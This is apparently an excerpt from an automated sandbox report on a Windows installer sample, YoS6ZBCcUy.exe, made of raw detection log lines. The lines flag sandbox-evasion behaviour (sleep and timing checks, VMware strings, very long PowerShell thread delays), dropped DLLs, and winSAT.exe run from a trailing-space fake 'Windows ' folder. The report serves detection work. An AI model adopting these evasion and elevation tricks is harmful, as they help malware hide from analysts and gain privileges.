Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\MyElectronApp\Bginfo.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\MyElectronApp\Bginfo.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

barindex
Contains functionality to detect sleep reduction / modifications
Source: C:\Windows \System32\winSAT.exeCode function: 19_2_00007FF78100B90019_2_00007FF78100B900
Source: C:\Windows \System32\winSAT.exeCode function: 19_2_00007FF78100B75C19_2_00007FF78100B75C
Source: C:\Windows \System32\winSAT.exeCode function: 22_2_00007FF78100B90022_2_00007FF78100B900
Source: C:\Windows \System32\winSAT.exeCode function: 22_2_00007FF78100B75C22_2_00007FF78100B75C
Source: C:\Windows \System32\winSAT.exeCode function: 31_2_00007FF78100B90031_2_00007FF78100B900
Source: C:\Windows \System32\winSAT.exeCode function: 31_2_00007FF78100B75C31_2_00007FF78100B75C
Delayed program exit found
Source: C:\Windows \System32\winSAT.exeCode function: 19_2_00007FF780FD4D04 Sleep,ExitProcess,19_2_00007FF780FD4D04
Source: C:\Windows \System32\winSAT.exeCode function: 22_2_00007FF780FD4D04 Sleep,ExitProcess,22_2_00007FF780FD4D04
Source: C:\Windows \System32\winSAT.exeCode function: 31_2_00007FF780FD4D04 Sleep,ExitProcess,31_2_00007FF780FD4D04
Source: C:\Windows \System32\winSAT.exeCode function: 19_2_00007FF780FE5108 rdtsc 19_2_00007FF780FE5108
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4933Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 991Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4400
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2193
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7868
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1604
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3642
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 868
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2892
Source: C:\Users\user\AppData\Roaming\MyElectronApp\Bginfo.exeWindow / User API: threadDelayed 9325
Source: C:\Users\user\AppData\Roaming\MyElectronApp\Bginfo.exeWindow / User API: foregroundWindowGot 1772
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1972
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2265
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 494
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5812
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3971
Source: C:\Users\user\Desktop\YoS6ZBCcUy.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\7z-out\vulkan-1.dllJump to dropped file
Source: C:\Users\user\Desktop\YoS6ZBCcUy.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\7z-out\libEGL.dllJump to dropped file
Source: C:\Users\user\Desktop\YoS6ZBCcUy.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Programs\NSIS\libEGL.dllJump to dropped file
Source: C:\Users\user\Desktop\YoS6ZBCcUy.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\7z-out\resources\elevate.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\234d6ba4-850d-4c80-8096-274aff2a3936.tmp.dllJump to dropped file
Source: C:\Users\user\Desktop\YoS6ZBCcUy.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\7z-out\libGLESv2.dllJump to dropped file
Source: C:\Users\user\Desktop\YoS6ZBCcUy.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\nsExec.dllJump to dropped file
Source: C:\Users\user\Desktop\YoS6ZBCcUy.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\7z-out\d3dcompiler_47.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\039a5ffc-3e3b-416f-b75e-1c58b05c238b.tmp.dllJump to dropped file
Source: C:\Users\user\Desktop\YoS6ZBCcUy.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\System.dllJump to dropped file
Source: C:\Users\user\Desktop\YoS6ZBCcUy.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Programs\NSIS\libGLESv2.dllJump to dropped file
Source: C:\Users\user\Desktop\YoS6ZBCcUy.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Programs\NSIS\d3dcompiler_47.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\55211371-e4e4-4315-9751-4ed29e5502da.tmp.dllJump to dropped file
Source: C:\Users\user\Desktop\YoS6ZBCcUy.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\7z-out\vk_swiftshader.dllJump to dropped file
Source: C:\Users\user\Desktop\YoS6ZBCcUy.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\SpiderBanner.dllJump to dropped file
Source: C:\Users\user\Desktop\YoS6ZBCcUy.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\StdUtils.dllJump to dropped file
Source: C:\Users\user\Desktop\YoS6ZBCcUy.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\nsis7z.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\b1dc575e-7958-4cdc-a4c8-223d21682d6f.tmp.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\aa6ee5f9-f11d-4a3b-adf5-0dc4d4da48f4.tmp.dllJump to dropped file
Source: C:\Windows \System32\winSAT.exeAPI coverage: 5.8 %
Source: C:\Windows \System32\winSAT.exeAPI coverage: 5.9 %
Source: C:\Windows \System32\winSAT.exeCode function: 31_2_00007FF78100B75C31_2_00007FF78100B75C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7228Thread sleep count: 4933 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4408Thread sleep count: 991 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1904Thread sleep time: -3689348814741908s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5472Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3688Thread sleep count: 4400 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3688Thread sleep count: 2193 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3668Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5084Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3004Thread sleep time: -12912720851596678s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7644Thread sleep count: 3642 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2380Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3220Thread sleep count: 868 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7548Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7836Thread sleep count: 2892 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7836Thread sleep count: 118 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2256Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5252Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\MyElectronApp\Bginfo.exe TID: 6076Thread sleep time: -90500s >= -30000s
Source: C:\Users\user\AppData\Roaming\MyElectronApp\Bginfo.exe TID: 3588Thread sleep time: -414000s >= -30000s
Source: C:\Users\user\AppData\Roaming\MyElectronApp\Bginfo.exe TID: 3588Thread sleep time: -27975000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 732Thread sleep count: 1972 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7496Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 732Thread sleep count: 96 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7560Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1596Thread sleep count: 2265 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2492Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7452Thread sleep count: 494 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 764Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7784Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\d0010809Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\d0010809
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\d0010809
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\d0010809
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\d0010809
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Users\user\Desktop\YoS6ZBCcUy.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\MyElectronApp\Bginfo.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeFile Volume queried: C:\Users\user\AppData\Local\Programs\NSIS FullSizeInformation
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeFile Volume queried: C:\Users\user\AppData\Local\Programs\NSIS FullSizeInformation
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeFile Volume queried: C:\Users\user\AppData\Local\Temp FullSizeInformation
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeFile Volume queried: C:\Users\user\AppData\Local\Temp FullSizeInformation
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeFile Volume queried: C:\Users\user FullSizeInformation
Source: C:\Users\user\Desktop\YoS6ZBCcUy.exeCode function: 0_2_004059CC GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_004059CC
Source: C:\Users\user\Desktop\YoS6ZBCcUy.exeCode function: 0_2_004065FD FindFirstFileW,FindClose,0_2_004065FD
Source: C:\Users\user\Desktop\YoS6ZBCcUy.exeCode function: 0_2_00402868 FindFirstFileW,0_2_00402868
Source: C:\Windows \System32\winSAT.exeCode function: 19_2_00007FF780FC90DC SetLastError,FindFirstFileW,GetLastError,FindClose,SetLastError,CreateFileW,ReadFile,GetLastError,CloseHandle,CloseHandle,19_2_00007FF780FC90DC
Source: C:\Windows \System32\winSAT.exeCode function: 22_2_00007FF780FD34C4 FindFirstFileW,GetLastError,FindClose,SetLastError,_CxxThrowException,22_2_00007FF780FD34C4
Source: C:\Windows \System32\winSAT.exeCode function: 22_2_00007FF780FC90DC SetLastError,FindFirstFileW,GetLastError,FindClose,SetLastError,CreateFileW,ReadFile,GetLastError,CloseHandle,CloseHandle,22_2_00007FF780FC90DC
Source: C:\Windows \System32\winSAT.exeCode function: 22_2_00007FFE10251B68 FindFirstFileExW,22_2_00007FFE10251B68
Source: C:\Windows \System32\winSAT.exeCode function: 22_2_00007FFE10251CEC FindFirstFileExW,FindNextFileW,FindClose,FindClose,22_2_00007FFE10251CEC
Source: C:\Windows \System32\winSAT.exeCode function: 31_2_00007FF780FD34C4 FindFirstFileW,GetLastError,FindClose,SetLastError,_CxxThrowException,31_2_00007FF780FD34C4
Source: C:\Windows \System32\winSAT.exeCode function: 31_2_00007FF780FC90DC SetLastError,FindFirstFileW,GetLastError,FindClose,SetLastError,CreateFileW,ReadFile,GetLastError,CloseHandle,CloseHandle,31_2_00007FF780FC90DC
Source: C:\Windows \System32\winSAT.exeCode function: 31_2_00007FFDFFE453DC FindFirstFileExW,FindNextFileW,FindClose,FindClose,31_2_00007FFDFFE453DC
Source: C:\Windows \System32\winSAT.exeCode function: 31_2_00007FFDFFE45258 FindFirstFileExW,31_2_00007FFDFFE45258
Source: C:\Windows \System32\winSAT.exeCode function: 19_2_00007FF780FE5EF0 GetLogicalProcessorInformation,GetLastError,GetLogicalProcessorInformation,GetLastError,GetSystemInfo,19_2_00007FF780FE5EF0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeFile opened: C:\Users\userJump to behavior
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeFile opened: C:\Users\user\AppData\Local\Programs\NSIS\resourcesJump to behavior
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeFile opened: C:\Users\user\AppData\Local\Programs\NSISJump to behavior
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeFile opened: C:\Users\user\AppData\Local\ProgramsJump to behavior
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077850274.00000000065A0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: bCK1sK9IRQq9qEmUv4RDsNuESgMjGWdqb8FuvAY5N9GIIvejQjBAMA8GA1UdEwEB/wQFMAMB
Source: YoS6ZBCcUy.exe, 00000000.00000003.1964331752.00000000061A0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: VMware
Source: YoS6ZBCcUy.exe, 00000000.00000003.2147321239.0000000004B55000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 6e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}out
